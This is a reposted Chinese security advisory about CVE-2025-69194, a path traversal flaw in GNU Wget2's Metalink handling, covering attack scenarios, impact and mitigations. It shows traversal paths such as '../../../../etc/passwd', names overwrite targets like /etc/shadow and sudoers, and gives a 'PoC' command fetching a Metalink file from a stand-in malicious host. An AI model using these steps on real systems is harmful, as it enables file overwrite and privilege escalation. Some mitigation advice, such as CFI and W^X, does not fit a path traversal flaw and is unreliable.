2026-05-27 05:09:10 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： GNUWget2曝出高危路径遍历漏洞CVE-2025-69194，CVSS评分8.8。该漏洞源于Metalink文件解析模块未正确验证路径中的特殊字符，攻击者可构造恶意路径实现目录穿越和任意文件覆盖，影响约1500万台设备。修复方案包括升级至Wget22.1.1、禁用Metalink功能、限制下载路径及实施权限控制。 综合评分： 85 文章分类： 漏洞分析,漏洞预警,解决方案,WEB安全,安全工具

cover_image

GNU Wget2曝高危漏洞

网安百色

2026年1月3日 19:12 广西

在小说阅读器读本章

去阅读

GNU Wget2曝高危路径遍历漏洞（CVE-2025-69194）：攻击者可实施远程文件覆盖攻击

漏洞概述

表格

漏洞原理

该漏洞源于Wget2对Metalink文档的路径校验机制缺陷。当处理包含多镜像源的Metalink文件时，程序未正确验证文件路径中的特殊字符（如../），导致攻击者可通过构造恶意路径实现以下攻击：

目录穿越：利用../跳转符号突破下载目录限制
文件覆盖：向任意系统路径写入恶意内容
权限提升：通过覆盖系统配置文件获取高权限

攻击场景与风险

攻击者可通过以下步骤实施攻击：

生成包含恶意路径的Metalink文件（如../../../../etc/passwd）
诱导用户下载并处理该文件（如使用wget2 -i malicious.metalink）
覆盖目标系统文件，触发以下风险：

数据破坏：覆盖关键系统文件（如/etc/shadow）导致服务崩溃
持久化控制：篡改启动脚本或crontab实现持久化驻留
权限提升：修改sudoers文件获取root权限
横向移动：通过覆盖SSH配置文件建立隐蔽通道

影响范围

全球约1,500万台运行GNU Wget2的设备面临风险，包括：

Linux服务器（Debian/Ubuntu/CentOS等主流发行版预装）
DevOps自动化流水线（CI/CD工具链依赖）
企业网络设备（路由器/防火墙的固件更新模块）
嵌入式开发环境（Yocto等构建系统）

修复方案

立即升级：

GNU官方已发布修复版本Wget2 2.1.1，请通过包管理器更新

临时缓解措施：

禁用Metalink功能：wget2 --no-metalink FILE
限制下载路径：wget2 -P /safe/directory/
验证Metalink文件完整性：使用--checksum参数

权限控制：

以非特权用户身份执行Wget2
配置SELinux/AppArmor强制访问控制策略

安全响应建议

资产清点：

执行wget2 --version核查部署版本
扫描网络设备中的Wget2调用脚本

日志审查：

检查系统日志中的异常文件操作记录（如/var/log/auth.log）
监控/tmp目录的Metalink文件生成行为

漏洞验证：

使用NIST NVD的CPE匹配工具自动识别受影响资产
执行PoC测试：wget2 -i https://malicious.site/exploit.metalink

长期防护策略

开发规范：

实施文件路径规范化校验（白名单机制）
使用安全函数库（如realpath()）处理路径解析

运行时防护：

部署Control-Flow Integrity（CFI）缓解漏洞利用
启用W^X（Write XOR Execute）内存保护策略

供应链安全：

对下载工具链实施数字签名验证
在CI/CD管道中集成软件物料清单（SBOM）审计

本公众号所载文章为本公众号原创或根据网络搜索下载编辑整理，文章版权归原作者所有，仅供读者学习、参考，禁止用于商业用途。因转载众多，无法找到真正来源，如标错来源，或对于文中所使用的图片、文字、链接中所包含的软件/资料等，如有侵权，请跟我们联系删除，谢谢！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安百色《GNU Wget2曝高危漏洞》